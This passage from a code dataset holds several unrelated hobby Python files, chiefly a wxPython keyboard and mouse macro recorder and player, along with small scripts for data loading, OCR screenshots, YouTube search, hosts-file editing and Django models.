wxID_FRAME1TEXTCTRL2, wxID_FRAME1TNUMRD,\n wxID_FRAME1TSTOP, wxID_FRAME1STATICTEXT5, wxID_FRAME1TEXTCTRL3,\n ] = [wx.NewId() for _init_ctrls in range(20)]\n\n\nclass Frame1(wx.Frame):\n def _init_ctrls(self, prnt):\n # generated method, don't edit\n wx.Frame.__init__(self, id=wxID_FRAME1, name='', parent=prnt,\n pos=wx.Point(506, 283), size=wx.Size(366, 201),\n style=wx.STAY_ON_TOP | wx.DEFAULT_FRAME_STYLE,\n title='键盘侠 v%s' % VERSION)\n self.SetClientSize(wx.Size(350, 205))\n\n self.panel1 = wx.Panel(id=wxID_FRAME1PANEL1, name='panel1', parent=self,\n pos=wx.Point(0, 0), size=wx.Size(350, 205),\n style=wx.NO_3D | wx.CAPTION)\n\n self.tnumrd = wx.StaticText(id=wxID_FRAME1TNUMRD, label='ready..',\n name='tnumrd', parent=self.panel1, pos=wx.Point(17, 175),\n size=wx.Size(100, 36), style=0)\n\n self.tstop = wx.StaticText(id=wxID_FRAME1TSTOP,\n label='If you want to stop it, Press F12', name='tstop',\n parent=self.panel1, pos=wx.Point(25, 332), size=wx.Size(183, 18),\n style=0)\n self.tstop.Show(False)\n\n self.stimes = wx.SpinCtrl(id=wxID_FRAME1STIMES, initial=0, max=1000,\n min=0, name='stimes', parent=self.panel1, pos=wx.Point(155, 137),\n size=wx.Size(60, 25), style=wx.SP_ARROW_KEYS)\n self.stimes.SetValue(1)\n\n self.label_run_times = wx.StaticText(id=wxID_FRAME1STATICTEXT2,\n label='执行次数(0为无限循环)',\n name='label_run_times', parent=self.panel1, pos=wx.Point(16, 141),\n size=wx.Size(136, 26), style=0)\n\n self.label_script = wx.StaticText(id=wxID_FRAME1STATICTEXT3,\n label='脚本', name='label_script', parent=self.panel1,\n pos=wx.Point(17, 20), size=wx.Size(40, 32), style=0)\n\n self.choice_script = wx.Choice(choices=[], id=wxID_FRAME1CHOICE_SCRIPT,\n name='choice_script', parent=self.panel1, pos=wx.Point(79, 15),\n size=wx.Size(108, 25), style=0)\n\n self.label_start_key = wx.StaticText(id=wxID_FRAME1STATICTEXT1,\n label='启动键', name='label_start_key',\n parent=self.panel1, pos=wx.Point(16, 63), size=wx.Size(56, 24),\n style=0)\n\n self.label_stop_key = wx.StaticText(id=wxID_FRAME1STATICTEXT4,\n label='终止键', name='label_stop_key',\n parent=self.panel1, pos=wx.Point(16, 102), size=wx.Size(56, 32),\n style=0)\n\n self.choice_start = wx.Choice(choices=[], id=wxID_FRAME1CHOICE_START,\n name='choice_start', parent=self.panel1, pos=wx.Point(79, 58),\n size=wx.Size(108, 25), style=0)\n self.choice_start.SetLabel('')\n self.choice_start.SetLabelText('')\n self.choice_start.Bind(wx.EVT_CHOICE, self.OnChoice_startChoice,\n id=wxID_FRAME1CHOICE_START)\n\n self.choice_stop = wx.Choice(choices=[], id=wxID_FRAME1CHOICE_STOP,\n name='choice_stop', parent=self.panel1, pos=wx.Point(79, 98),\n size=wx.Size(108, 25), style=0)\n self.choice_stop.Bind(wx.EVT_CHOICE, self.OnChoice_stopChoice,\n id=wxID_FRAME1CHOICE_STOP)\n\n def __init__(self, parent, *args, **kw):\n\n super().__init__(*args, **kw)\n self._init_ctrls(parent)\n\n self.SetIcon(GetMondrianIcon())\n self.taskBarIcon = TaskBarIcon(self)\n self.Bind(wx.EVT_CLOSE, self.OnClose)\n self.Bind(wx.EVT_ICONIZE, self.OnIconfiy)\n\n if not os.path.exists('scripts'):\n os.mkdir('scripts')\n self.scripts = os.listdir('scripts')[::-1]\n\n self.scripts = list(filter(lambda s: s.endswith('.txt'), self.scripts))\n self.choice_script.SetItems(self.scripts)\n if self.scripts:\n self.choice_script.SetSelection(0)\n\n self.choice_start.SetItems(HOT_KEYS)\n self.choice_start.SetSelection(3)\n\n self.choice_stop.SetItems(HOT_KEYS)\n self.choice_stop.SetSelection(6)\n\n self.running = False\n self.recording = False\n self.record = []\n self.ttt = current_ts()\n\n # for pause-resume feature\n self.paused = False\n self.pause_event = threading.Event()\n\n self.hm = pyWinhook.HookManager()\n\n def on_mouse_event(event):\n\n # print('MessageName:',event.MessageName) #事件名称\n # print('Message:',event.Message) #windows消息常量 \n # print('Time:',event.Time) #事件发生的时间戳 \n # print('Window:',event.Window) #窗口句柄 \n # print('WindowName:',event.WindowName) #窗口标题\n # print('Position:',event.Position) #事件发生时相对于整个屏幕的坐标\n # print('Wheel:',event.Wheel) #鼠标滚轮\n # print('Injected:',event.Injected) #判断这个事件是否由程序方式生成,而不是正常的人为触发。\n # print('---')\n\n if not self.recording or self.running:\n return True\n\n message = event.MessageName\n all_messages = ('mouse left down', 'mouse left up', 'mouse right down', 'mouse right up', 'mouse move')\n if message not in all_messages:\n return True\n\n pos = win32api.GetCursorPos()\n\n delay = current_ts() - self.ttt\n\n # # 录制鼠标轨迹的精度,数值越小越精准,但同时可能产生大量的冗余\n # mouse_move_interval_ms = self.mouse_move_interval_ms.Value or 999999\n #\n # if message == 'mouse move' and delay < mouse_move_interval_ms:\n # return True\n #\n # self.ttt = current_ts()\n # if not self.record:\n # delay = 0\n #\n # print(delay, message, pos)\n\n self.record.append([delay, 'EM', message, pos])\n text = self.tnumrd.GetLabel()\n action_count = text.replace(' actions recorded', '')\n text = '%d actions recorded' % (int(action_count) + 1)\n self.tnumrd.SetLabel(text)\n return True\n\n def on_keyboard_event(event):\n\n # print('MessageName:',event.MessageName) #同上,共同属性不再赘述\n # print('Message:',event.Message)\n # print('Time:',event.Time)\n # print('Window:',event.Window)\n # print('WindowName:',event.WindowName)\n # print('Ascii:', event.Ascii, chr(event.Ascii)) #按键的ASCII码\n # print('Key:', event.Key) #按键的名称\n # print('KeyID:', event.KeyID) #按键的虚拟键值\n # print('ScanCode:', event.ScanCode) #按键扫描码\n # print('Extended:', event.Extended) #判断是否为增强键盘的扩展键\n # print('Injected:', event.Injected)\n # print('Alt', event.Alt) #是某同时按下Alt\n # print('Transition', event.Transition) #判断转换状态\n # print('---')\n\n message = event.MessageName\n message = message.replace(' sys ', ' ')\n\n if message == 'key up' and not self.recording:\n # listen for start/stop script\n key_name = event.Key.lower()\n start_name = 'f6' # as default\n stop_name = 'f9' # as default\n\n start_index = self.choice_start.GetSelection()\n stop_index = self.choice_stop.GetSelection()\n start_name = HOT_KEYS[start_index].lower()\n stop_name = HOT_KEYS[stop_index].lower()\n\n if key_name == start_name and not self.running:\n print('script start')\n t = RunScriptClass(self, self.pause_event)\n t.start()\n print(key_name, 'host start')\n elif key_name == stop_name and self.running:\n print('script stop')\n self.tnumrd.SetLabel('broken')\n print(key_name, 'host stop')\n\n if not self.recording or self.running:\n return True\n\n all_messages = ('key down', 'key up')\n if message not in all_messages:\n return True\n\n key_info = (event.KeyID, event.Key, event.Extended)\n\n delay = current_ts() - self.ttt\n self.ttt = current_ts()\n if not self.record:\n delay = 0\n\n print(delay, message, key_info)\n\n self.record.append([delay, 'EK', message, key_info])\n text = self.tnumrd.GetLabel()\n action_count = text.replace(' actions recorded', '')\n text = '%d actions recorded' % (int(action_count) + 1)\n self.tnumrd.SetLabel(text)\n return True\n\n self.hm.MouseAll = on_mouse_event\n self.hm.KeyAll = on_keyboard_event\n self.hm.HookMouse()\n self.hm.HookKeyboard()\n\n def get_script_path(self):\n i = self.choice_script.GetSelection()\n if i < 0:\n return ''\n script = self.scripts[i]\n path = os.path.join(os.getcwd(), 'scripts', script)\n print(path)\n return path\n\n def new_script_path(self):\n now = datetime.datetime.now()\n script = '%s.txt' % now.strftime('%m%d_%H%M')\n if script in self.scripts:\n script = '%s.txt' % now.strftime('%m%d_%H%M%S')\n self.scripts.insert(0, script)\n self.choice_script.SetItems(self.scripts)\n self.choice_script.SetSelection(0)\n return self.get_script_path()\n\n def OnHide(self, event):\n self.Hide()\n event.Skip()\n\n def OnIconfiy(self, event):\n self.Hide()\n event.Skip()\n\n def OnClose(self, event):\n self.taskBarIcon.Destroy()\n self.Destroy()\n event.Skip()\n\n def OnButton1Button(self, event):\n event.Skip()\n\n def OnBtrecordButton(self, event):\n\n if self.recording:\n print('record stop')\n self.recording = False\n self.record = self.record[:-2]\n output = json.dumps(self.record, indent=1)\n output = output.replace('\\r\\n', '\\n').replace('\\r', '\\n')\n output = output.replace('\\n ', '').replace('\\n ', '')\n output = output.replace('\\n ]', ']')\n open(self.new_script_path(), 'w').write(output)\n self.btrecord.SetLabel('录制')\n self.tnumrd.SetLabel('finished')\n self.record = []\n else:\n print('record start')\n self.recording = True\n self.ttt = current_ts()\n status = self.tnumrd.GetLabel()\n if 'running' in status or 'recorded' in status:\n return\n self.btrecord.SetLabel('结束') # 结束\n self.tnumrd.SetLabel('0 actions recorded')\n self.choice_script.SetSelection(-1)\n self.record = []\n\n event.Skip()\n\n def OnBtrunButton(self, event):\n print('script start by btn')\n t = RunScriptClass(self, self.pause_event)\n t.start()\n event.Skip()\n\n def OnBtpauseButton(self, event):\n print('script pause button pressed')\n if self.paused:\n print('script is resumed')\n self.pause_event.set()\n self.paused = False\n self.btpause.SetLabel('暂停')\n else:\n print('script is paused')\n self.pause_event.clear()\n self.paused = True\n self.btpause.SetLabel('继续')\n event.Skip()\n\n def OnChoice_startChoice(self, event):\n event.Skip()\n\n def OnChoice_stopChoice(self, event):\n event.Skip()\n\n\nclass RunScriptClass(threading.Thread):\n\n def __init__(self, frame: Frame1, event: threading.Event):\n self.frame = frame\n self.event = event\n self.event.set()\n super(RunScriptClass, self).__init__()\n\n def run(self):\n\n status = self.frame.tnumrd.GetLabel()\n if self.frame.running or self.frame.recording:\n return\n\n if 'running' in status or 'recorded' in status:\n return\n\n script_path = self.frame.get_script_path()\n if not script_path:\n self.frame.tnumrd.SetLabel('script not found, please self.record first!')\n return\n\n self.frame.running = True\n\n try:\n self.run_times = self.frame.stimes.Value\n self.running_text = '%s running..' % script_path.split('/')[-1].split('\\\\')[-1]\n self.frame.tnumrd.SetLabel(self.running_text)\n self.frame.tstop.Shown = True\n\n self.j = 0\n while self.j < self.run_times or self.run_times == 0:\n self.j += 1\n current_status = self.frame.tnumrd.GetLabel()\n if current_status in ['broken', 'finished']:\n self.frame.running = False\n break\n RunScriptClass.run_script_once(script_path, thd=self)\n\n self.frame.tnumrd.SetLabel('finished')\n self.frame.tstop.Shown = False\n self.frame.running = False\n print('script run finish!')\n\n except Exception as e:\n print('run error', e)\n traceback.print_exc()\n self.frame.tnumrd.SetLabel('failed')\n self.frame.tstop.Shown = False\n self.frame.running = False\n\n @classmethod\n def run_script_once(cls, script_path, thd=None):\n\n content = ''\n\n lines = []\n\n try:\n lines = open(script_path, 'r', encoding='utf8').readlines()\n except Exception as e:\n print(e)\n try:\n lines = open(script_path, 'r', encoding='gbk').readlines()\n except Exception as e:\n print(e)\n\n for line in lines:\n # 去注释\n if '//' in line:\n index = line.find('//')\n line = line[:index]\n # 去空字符\n line = line.strip()\n content += line\n\n # 去最后一个元素的逗号(如有)\n content = content.replace('],\\n]', ']\\n]').replace('],]', ']]')\n\n print(content)\n s = json.loads(content)\n steps = len(s)\n\n sw = win32api.GetSystemMetrics(win32con.SM_CXSCREEN)\n sh = win32api.GetSystemMetrics(win32con.SM_CYSCREEN)\n\n for i in range(steps):\n\n print(s[i])\n\n delay = s[i][0]\n event_type = s[i][1].upper()\n message = s[i][2].lower()\n action = s[i][3]\n\n time.sleep(delay / 1000.0)\n\n if thd:\n current_status = thd.frame.tnumrd.GetLabel()\n if current_status in ['broken', 'finished']:\n break\n thd.event.wait()\n text = '%s [%d/%d %d/%d]' % (thd.running_text, i + 1, steps, thd.j, thd.run_times)\n thd.frame.tnumrd.SetLabel(text)\n\n if event_type == 'EM':\n x, y = action\n\n if action == [-1, -1]:\n # 约定 [-1, -1] 表示鼠标保持原位置不动\n pass\n else:\n # 挪动鼠标 普通做法\n # ctypes.windll.user32.SetCursorPos(x, y)\n # or\n # win32api.SetCursorPos([x, y])\n\n # 更好的兼容 win10 屏幕缩放问题\n nx = int(x * 65535 / sw)\n ny = int(y * 65535 / sh)\n win32api.mouse_event(win32con.MOUSEEVENTF_ABSOLUTE | win32con.MOUSEEVENTF_MOVE, nx, ny, 0, 0)\n\n if message == 'mouse left down':\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0)\n elif message == 'mouse left up':\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, 0, 0, 0, 0)\n elif message == 'mouse right down':\n win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTDOWN, 0, 0, 0, 0)\n elif message == 'mouse right up':\n win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTUP, 0, 0, 0, 0)\n elif message == 'mouse move':\n pass\n else:\n print('unknow mouse event:', message)\n\n elif event_type == 'EK':\n key_code, key_name, extended = action\n\n # shift ctrl alt\n # if key_code >= 160 and key_code <= 165:\n # key_code = int(key_code/2) - 64\n\n base = 0\n if extended:\n base = win32con.KEYEVENTF_EXTENDEDKEY\n\n if message == 'key down':\n win32api.keybd_event(key_code, 0, base, 0)\n elif message == 'key up':\n win32api.keybd_event(key_code, 0, base | win32con.KEYEVENTF_KEYUP, 0)\n else:\n print('unknow keyboard event:', message)\n\n elif event_type == 'EX':\n\n if message == 'input':\n text = action\n pyperclip.copy(text)\n # Ctrl+V\n win32api.keybd_event(162, 0, 0, 0) # ctrl\n win32api.keybd_event(86, 0, 0, 0) # v\n win32api.keybd_event(86, 0, win32con.KEYEVENTF_KEYUP, 0)\n win32api.keybd_event(162, 0, win32con.KEYEVENTF_KEYUP, 0)\n else:\n print('unknow extra event:', message)\n\n\nclass TaskBarIcon(wxTaskBarIcon):\n ID_About = wx.NewId()\n ID_Closeshow = wx.NewId()\n\n def __init__(self, frame):\n wxTaskBarIcon.__init__(self)\n self.frame = frame\n self.SetIcon(GetMondrianIcon())\n self.Bind(EVT_TASKBAR_LEFT_DCLICK, self.OnTaskBarLeftDClick)\n self.Bind(wx.EVT_MENU, self.OnAbout, id=self.ID_About)\n self.Bind(wx.EVT_MENU, self.OnCloseshow, id=self.ID_Closeshow)\n\n def OnTaskBarLeftDClick(self, event):\n if self.frame.IsIconized():\n self.frame.Iconize(False)\n if not self.frame.IsShown():\n self.frame.Show(True)\n self.frame.Raise()\n\n def OnAbout(self, event):\n wx.MessageBox('https://github.com/taojy123/KeymouseGo', 'KeymouseGo v%s' % VERSION)\n event.Skip()\n\n def OnCloseshow(self, event):\n self.frame.Close(True)\n event.Skip()\n\n def CreatePopupMenu(self):\n menu = wx.Menu()\n menu.Append(self.ID_About, 'About')\n menu.Append(self.ID_Closeshow, 'Exit')\n return menu\n","sub_path":"KeyboardMan/Frame1.py","file_name":"Frame1.py","file_ext":"py","file_size_in_byte":21250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142321369","text":"#! /usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Time : 2020/8/2 11:49 AM\n# @Author: zhangzhihui.wisdom\n# @File:enumClass.py\n\nfrom enum import Enum\n\n\nif __name__ == '__main__':\n Month = Enum('Month', ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\n dir(Month)\n for name, member in Month.iterms():\n print(name, '=>', member, ',', member.value)\n print('''enum class \n learn\n ''')\n","sub_path":"enumClass.py","file_name":"enumClass.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"120435310","text":"import json\nimport logging\nfrom os import path\nfrom pathlib import Path\n\nfrom futils import timeit\nfrom tqdm import tqdm\n\nfrom matching import Library, Sequence, match_library\n\n# Logging configuration\ncurrent_file = path.basename(__file__).split(\".\")[0]\n\nlogging.basicConfig(\n format=\"%(asctime)s:%(levelname)s: %(message)s\",\n filename=f\"logs/{current_file}.log\",\n encoding=\"utf-8\",\n level=logging.DEBUG,\n)\n\n\n# Algorithm Threshold between [0.0, 1.0]\nMATCH_THRESHOLD = 0.99\n\n\n@timeit\ndef match_libs(seq, libs, threshold=0.5):\n \"\"\"\n Match libs with the sequence\n \"\"\"\n result = []\n for lib in tqdm(libs):\n pop = {}\n pop[\"library\"] = lib[\"name\"]\n candidates = match_library(seq, Library(lib), threshold)\n cl = []\n for candidate in candidates:\n for c in candidate:\n cl.append(\n {\n \"name\": c.name,\n \"score\": c.score,\n \"start\": c.start,\n \"length\": c.length,\n \"end\": c.end,\n }\n )\n pop[\"candidates\"] = cl\n result.append(pop)\n return result\n\n\ndef get_sequences(dir_dict):\n \"\"\"\n Return list of sequences\n \"\"\"\n\n SEQUENCES_EXTENSION = dir_dict[\"extension\"]\n SEQUENCES_PATH = dir_dict[\"sequences_path\"]\n seq_dir_names = dir_dict[\"seq_dir_names\"]\n\n sequences = []\n for seq_dir in seq_dir_names:\n seqs = Path(path.join(SEQUENCES_PATH, seq_dir)).rglob(\n \"*{0}\".format(SEQUENCES_EXTENSION)\n )\n sequences.append(seqs)\n return sequences\n\n\ndef get_slices_libs(template):\n \"\"\"\n Get slices libraries\n\n Args:\n template (dict): Template JSON data as a dict structure\n Returns:\n dict of slices libraries\n \"\"\"\n\n slices_libs = {}\n for sli in template[\"template_slices\"]:\n libs = []\n for pos in sli[\"template_slice\"]:\n lib = template[\"template\"][\"structure\"][pos - 1][\"library_source\"]\n libs.append(template[\"component_sources\"][lib])\n slices_libs[sli[\"name\"]] = libs\n return slices_libs\n\n\n@timeit\ndef iter_all_seq(input_sequences, output_filename, templatef):\n \"\"\"\n Iterate over sequences\n\n Args:\n input_sequences (dict): Input dictionary with info about the input sequences:\n output_filename (str): Output filename\n\n Example:\n\n input_sequences = {\n 'extension' = \".seq\"\n 'sequences_path' = \"/data/Imperial/src/lyc-basic-ass-ind/\"\n 'seq_dir_names' = [\"output\"]\n }\n \"\"\"\n\n # Get sequences to match\n sequences = get_sequences(input_sequences)\n\n # Get the filenames in a list and not this freakin generator\n seq_filenames = []\n for seq in sequences:\n for filename in seq:\n seq_filenames.append(filename)\n\n # Loop over the sequences\n r = []\n for filename in seq_filenames:\n sq = Sequence(filename)\n json_to_output = {}\n json_to_output[\"target\"] = sq.name\n\n # Logging\n logging.info(f\"Target sequence: {sq.name}\")\n\n with open(templatef) as json_file:\n template = json.load(json_file)\n\n # Get libs from template\n template[\"template\"]\n libs = get_slices_libs(template)\n\n # Primer\n print(sq.name)\n primer = sq.name.split(\"_\")[2] # \"vio_000_tu5\"\n if primer == \"tu1\":\n libs_to_match = libs['TU-1']\n elif primer == \"tu2\":\n libs_to_match = libs['TU-2']\n elif primer == \"tu3\":\n libs_to_match = libs['TU-3']\n elif primer == \"tu4\":\n libs_to_match = libs['TU-4']\n elif primer == \"tu5\":\n libs_to_match = libs['TU-5']\n else:\n raise OSError(\"Primer not found\",sq.name)\n\n # Match sequence\n matches = match_libs(sq, libs_to_match, threshold=MATCH_THRESHOLD)\n json_to_output[\"matches\"] = matches\n r.append(json_to_output)\n\n # Write output result in JSON file\n with open(output_filename, \"w\") as f:\n json.dump(r, f, indent=2, separators=(\",\", \":\"))\n\n\ndef run_test(targets, candidates, nbloop):\n \"\"\"\n Run tests\n \"\"\"\n\n OUTPUT_DIR = \"output_results/\"\n\n msg = f\"Test Algo1: Target: {targets['seq_dir_names']} - Candidates: {path.basename(candidates)} - Nb runs: {nbloop}\"\n logging.info(msg)\n\n # Iterate and match libs over the input sequences above\n for i in range(nbloop):\n msg = f\"Test run: ({i+1}/{nbloop})\"\n logging.info(msg)\n OUTPUT_FILENAME = f\"matching-results-{current_file}-run-{i}.json\"\n iter_all_seq(targets, path.join(OUTPUT_DIR, OUTPUT_FILENAME), candidates)\n\n\ndef test_algo2_1():\n \"\"\"\n Test Algo2\n 1 Target\n Candidate Template with 5 TUs\n \"\"\"\n\n targets = {\n \"extension\": \".seq\",\n \"sequences_path\": \"/data/Imperial/src/violacein-basic-ass\",\n \"seq_dir_names\": [\"output/tu/\"],\n }\n\n candidates = \"/data/Imperial/src/matching/templates/template_violacein_tu.json\"\n nbloop = 10 \n\n run_test(targets, candidates, nbloop)\n\n\ndef main():\n \"\"\"\n Main\n \"\"\"\n test_algo2_1()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"benchmarks/run_algo2.py","file_name":"run_algo2.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"51469444","text":"import py_avataaars as pa\n\navatar = pa.PyAvataaar(\n style=pa.AvatarStyle.CIRCLE,\n skin_color=pa.SkinColor.LIGHT,\n hair_color=pa.HairColor.BROWN,\n facial_hair_type=pa.FacialHairType.DEFAULT,\n facial_hair_color=pa.FacialHairColor.BLACK,\n top_type=pa.TopType.SHORT_HAIR_SHORT_FLAT,\n hat_color=pa.ClotheColor.BLACK,\n mouth_type=pa.MouthType.SMILE,\n eye_type=pa.EyesType.DEFAULT,\n eyebrow_type=pa.EyebrowType.DEFAULT,\n nose_type=pa.NoseType.DEFAULT,\n accessories_type=pa.AccessoriesType.DEFAULT,\n clothe_type=pa.ClotheType.GRAPHIC_SHIRT,\n clothe_color=pa.ClotheColor.HEATHER,\n clothe_graphic_type=pa.ClotheGraphicType.BAT,\n)\navatar.render_png_file('avatar2.png')\n","sub_path":"Misc/Py_Avatars.py","file_name":"Py_Avatars.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"416714978","text":"#!/usr/bin/env python3\n#Write each line of host.max to host.max.new \n#untill line ## BEGIN DD SECTION\n#Then write contents of sitelist.txt to host.max.new\n\n\nfo_host_og = open('host.max', 'r')\nfo_host_new = open('host.max.new', 'w')\n \nsite_line_fo = open('site_list.txt', 'r')\nsite_line_list = site_line_fo.readlines()\nDEBUG = True\nif DEBUG:\n print('site_line_list: %s' % site_line_list)\n\nfor host_line in fo_host_og.readlines():\n if DEBUG:\n print('\\n\\n--------------------------\\nTop of host_line for loop')\n print('host_line: \"%s\"' % host_line) \n fo_host_new.write(host_line)\n if DEBUG:\n print('about to do ## BEGIN DD if')\n if host_line.strip() == '## BEGIN DD SECTION':\n if DEBUG:\n print('break works')\n break\nsite_line_string = \"\\n\".join(site_line_list)\nfo_host_new.write(site_line_string)\nif DEBUG: \n print('about to write site_list.txt contents')\nprint('this is after the for loop') ","sub_path":"D_D.py","file_name":"D_D.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"145690979","text":"from PIL import ImageGrab,Image\r\nimport keyboard #监控键盘\r\nfrom time import sleep\r\nimport sys\r\nfrom BaiDu import BaiDuAPI\r\nfrom getText import GetText\r\nimport os\r\n\r\nDIR_PATH = os.getcwd()\r\n\r\n#获取剪切板上的图片信息并保存到本地\r\ndef screenShot():\r\n #QQ截图按住Ctrl+A+alt截图,enter完成截图\r\n if keyboard.wait(hotkey='f1')==None:\r\n if keyboard.wait(hotkey='enter')==None:\r\n sleep(0.01)\r\n #获取剪切板的图像内容\r\n im=ImageGrab.grabclipboard()\r\n #判断im的类型是否为图片\r\n if isinstance(im,Image.Image):\r\n im.save('imageGrab.png')\r\n else:\r\n print('重新截图')\r\n else:\r\n print('请按f1来截图识别文字')\r\n\r\nif __name__=='__main__':\r\n baiduapi=BaiDuAPI(DIR_PATH + r'\\password.ini')\r\n #baiduapi=BaiDuAPI\r\n \r\n #maxsize for循环是为了可以循环截图,一直不结束程序\r\n for _ in range(sys.maxsize):\r\n \r\n screenShot()\r\n \r\n text=baiduapi.picture2Text(DIR_PATH + r'\\imageGrab.png')\r\n \r\n print(text)\r\n GetText.setText(text)\r\n GetText.getText()","sub_path":"screenShot.py","file_name":"screenShot.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"95758826","text":"import csv, sys\n\npodcast_csv = open('podcastInfo.csv')\nrss_file = open('rssFeed.txt', 'w')\n\npodreader = csv.reader(podcast_csv, delimiter=',')\n\nrss_links = [line[6] for line in podreader if len(line) >= 7]\n\nfor rss in rss_links:\n\trss_file.write(f'{rss}\\n')","sub_path":"_site/convertCsv.py","file_name":"convertCsv.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"302899854","text":"# coding: utf-8\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup\nimport requests\ndriver = webdriver.Chrome(\"D:/Programming/chromedriver.exe\") # Opening Chrome browser.\ndriver.get(\"https://youtube.com\")\nelem = driver.find_element_by_name(\"search_query\")\nelem.clear()\nsong = input(\"Enter the name of the song : \")\nelem.send_keys(song)\nelem.send_keys(Keys.RETURN)\nurl = driver.current_url\npage = requests.get(url)\nsoup = BeautifulSoup(page.text, 'html.parser')\nlinks = soup.find_all(\"h3\")\nlnk = links[3].find_all(\"a\")\nlink = lnk[0][\"href\"]\ndriver.get(\"https://youtube.com\" + link)","sub_path":"YouTube_Songs.py","file_name":"YouTube_Songs.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"477456876","text":"import scipy.io\nfrom sklearn.model_selection import StratifiedShuffleSplit\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom dataset import get_transforms, DigitsDataset\nfrom utils import seed_fn\n\n\ndef get_loader(X, y, stage='TRAIN', shuffle=True, bs=32, num_workers=0):\n transforms = get_transforms(stage)\n dataset = DigitsDataset(\n data=X, labels=y,\n transforms=transforms,\n )\n loader = DataLoader(\n dataset, batch_size=bs, shuffle=shuffle,\n num_workers=num_workers, worker_init_fn=seed_fn,\n )\n\n return loader\n\n\ndef load_svhn(path):\n data = scipy.io.loadmat(path)\n imgs, labels = data['X'], data['y']\n imgs = imgs.transpose(3, 0, 1, 2)\n labels = labels.reshape(-1)\n labels[labels==10] = 0\n\n return imgs, labels\n\n\ndef load_mnist(path):\n imgs, labels = torch.load(path)\n imgs = torch.stack([imgs]*3, dim=-1).numpy()\n\n return imgs, labels\n\n\ndef get_data(data_path, svhn_path, mnist_path):\n X, y = load_svhn(data_path / svhn_path)\n test_X, test_y = load_mnist(data_path / mnist_path)\n\n sss = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=0)\n for train_index, valid_index in sss.split(X, y):\n break\n train_X, train_y = X[train_index], y[train_index]\n valid_X, valid_y = X[valid_index], y[valid_index]\n\n return train_X, train_y, valid_X, valid_y, test_X, test_y","sub_path":"dataset/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"60274886","text":"from django.db import models\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\nclass Pessoa(models.Model):\n\tnome = models.CharField(max_length=200, null=True, blank=True)\n\temail = models.EmailField(max_length=100, null=True, blank=True, unique=True)\n\tcpf = models.CharField(max_length=20, null=True, blank=True, unique=True)\n\tcontato = models.CharField(max_length=100, null=True, blank=True)\n\tusuario = models.OneToOneField(User, on_delete=models.CASCADE, null=True, blank=True, unique=True)\n\n\tdef __str__(self):\n\t\treturn self.nome\n\nclass Aluno(Pessoa):\n\tnascimento = models.DateField(null=True, blank=True)\n\t\nclass Funcionario(Pessoa):\n\n\tsalario = models.FloatField(max_length=20, null=True, blank=True)\n\tdata_contratacao = models.DateField(null=True, blank=True)\n\t\t\n\n\nclass Endereco(models.Model):\n\tuf_choices = [\n\t\t\t('AC', 'Acre'),\n\t\t\t('PI', 'Piauí'),\n\t\t\t('AL', 'Alagoas'),\n ('AP', 'Amapá'),\n ('BA', 'Bahia'),\n ('CE', 'Ceará'),\n ('DF', 'Distrito Federal'),\n ('ES', 'Espírito Santo'),\n ('GO', 'Goiás'),\n ('MA', 'Maranhão'),\n ('MG', 'Minas Gerais'),\n ('MS', 'Mato Grosso do Sul'),\n ('MT', 'Mato Grosso'),\n ('PA', 'Pará'),\n ('PB', 'Paraíba'),\n ('PE', 'Pernanbuco'),\n ('PI', 'Piauí'),\n ('PR', 'Paraná'),\n ('RJ', 'Rio de Janeiro'),\n ('RN', 'Rio Grande do Norte'),\n ('RO', 'Rondônia'),\n ('RR', 'Roraima'),\n ('RS', 'Rio Grande do Sul'),\n ('SC', 'Santa Catarina'),\n ('SE', 'Sergipe'),\n ('SP', 'São Paulo'),\n ('TO', 'Tocantins')\n ]\n\tcep = models.CharField(max_length=10)\n\tuf = models.CharField(max_length=2, choices=uf_choices)\n\tcidade = models.CharField(max_length=100)\n\tbairro = models.CharField(max_length=20)\n\tnumero = models.CharField(max_length=10)\n\trua = models.CharField(max_length=20)\n\tpessoa = models.OneToOneField(Pessoa, blank=True, null=True, on_delete=models.CASCADE)\n\n\n\t\t\t\n\tdef __str__(self):\n\t\treturn self.rua\n\n\n\nclass Turma(models.Model):\n\tturma = models.CharField(max_length=20)\n\tcodigo = models.CharField(max_length=20)\n\n\tdef __str__(self):\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\treturn self.turma\t\n\n\n\nclass Turno(models.Model):\n\tturno = models.CharField(max_length=10)\n\n\tdef __str__(self):\n\t\treturn self.turno\n\n\n\nclass Matricula(models.Model):\n\tstatus_choices=[\n\t\t\t('PENDENTE', 'PENDENTE'),\n\t\t\t('CONCLUÍDA', 'CONCLUÍDA'),\n\t\t\t('CANCELADA', 